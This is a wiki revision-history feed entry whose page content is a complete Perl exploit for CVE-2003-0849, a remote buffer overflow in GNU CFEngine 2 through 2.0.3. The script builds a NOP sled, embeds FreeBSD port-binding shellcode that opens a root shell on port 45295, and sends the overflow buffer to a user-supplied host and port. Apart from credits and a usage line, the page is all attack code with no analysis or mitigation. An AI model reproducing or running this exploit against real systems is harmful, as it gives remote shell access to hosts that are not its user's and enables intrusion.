https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2003-0849_GNU_CFEngine_2.-2.0.3_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E CVE-2003-0849 GNU CFEngine 2.-2.0.3 遠程緩衝區溢出漏洞 - Revision history 2026-04-10T02:16:04Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2003-0849_GNU_CFEngine_2.-2.0.3_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=2073&oldid=prev Pwnwiki: Created page with "==EXP== <pre> #!/usr/bin/perl -s # kokaninATdtors.net / cfengine2-2.0.3 from freebsd ports 26/sep/2003. # forking portbind shellcode port=0xb0ef(45295) by eSDee # bug discover..." 2021-05-03T12:40:21Z <p>Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/perl -s # kokaninATdtors.net / cfengine2-2.0.3 from freebsd ports 26/sep/2003. # forking portbind shellcode port=0xb0ef(45295) by eSDee # bug discover...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> #!/usr/bin/perl -s<br /> # kokaninATdtors.net / cfengine2-2.0.3 from freebsd ports 26/sep/2003.<br /> # forking portbind shellcode port=0xb0ef(45295) by eSDee<br /> # bug discovered by nick cleaton, tested on FreeBSD 4.8-RELEASE<br /> <br /> use IO::Socket;<br /> if(!$ARGV[1])<br /> { print &quot;usage: ./DSR-cfengine.pl &lt;host&gt; &lt;port&gt; (default cfengine is 5308)\n&quot;; exit(-1); }<br /> <br /> $host = $ARGV[0];<br /> $port = $ARGV[1];<br /> $nop = &quot;\x90&quot;;<br /> $ret = pack(&quot;l&quot;,0xbfafe3dc);<br /> $shellcode = <br /> &quot;\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0&quot;.<br /> &quot;\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02&quot;.<br /> &quot;\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80&quot;.<br /> &quot;\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57&quot;.<br /> &quot;\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89&quot;.<br /> &quot;\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50&quot;.<br /> &quot;\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80&quot;.<br /> &quot;\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56&quot;.<br /> &quot;\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd&quot;.<br /> &quot;\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f&quot;.<br /> &quot;\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b&quot;.<br /> &quot;\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80&quot;.<br /> &quot;\xeb\x9a&quot;;<br /> <br /> <br /> $buf = $nop x 2222 . $shellcode . $ret x 500;<br /> <br /> $socket = new IO::Socket::INET ( <br /> Proto =&gt; &quot;tcp&quot;,<br /> PeerAddr =&gt; $host,<br /> PeerPort =&gt; $port, <br /> );<br /> <br /> die &quot;unable to connect to $host:$port ($!)\n&quot; unless $socket;<br /> <br /> sleep(1); #you might have to adjust this on slow connections<br /> print $socket $buf;<br /> <br /> close($socket);<br /> <br /> <br /> # milw0rm.com [2003-09-27]<br /> <br /> &lt;/pre&gt;</div> Pwnwiki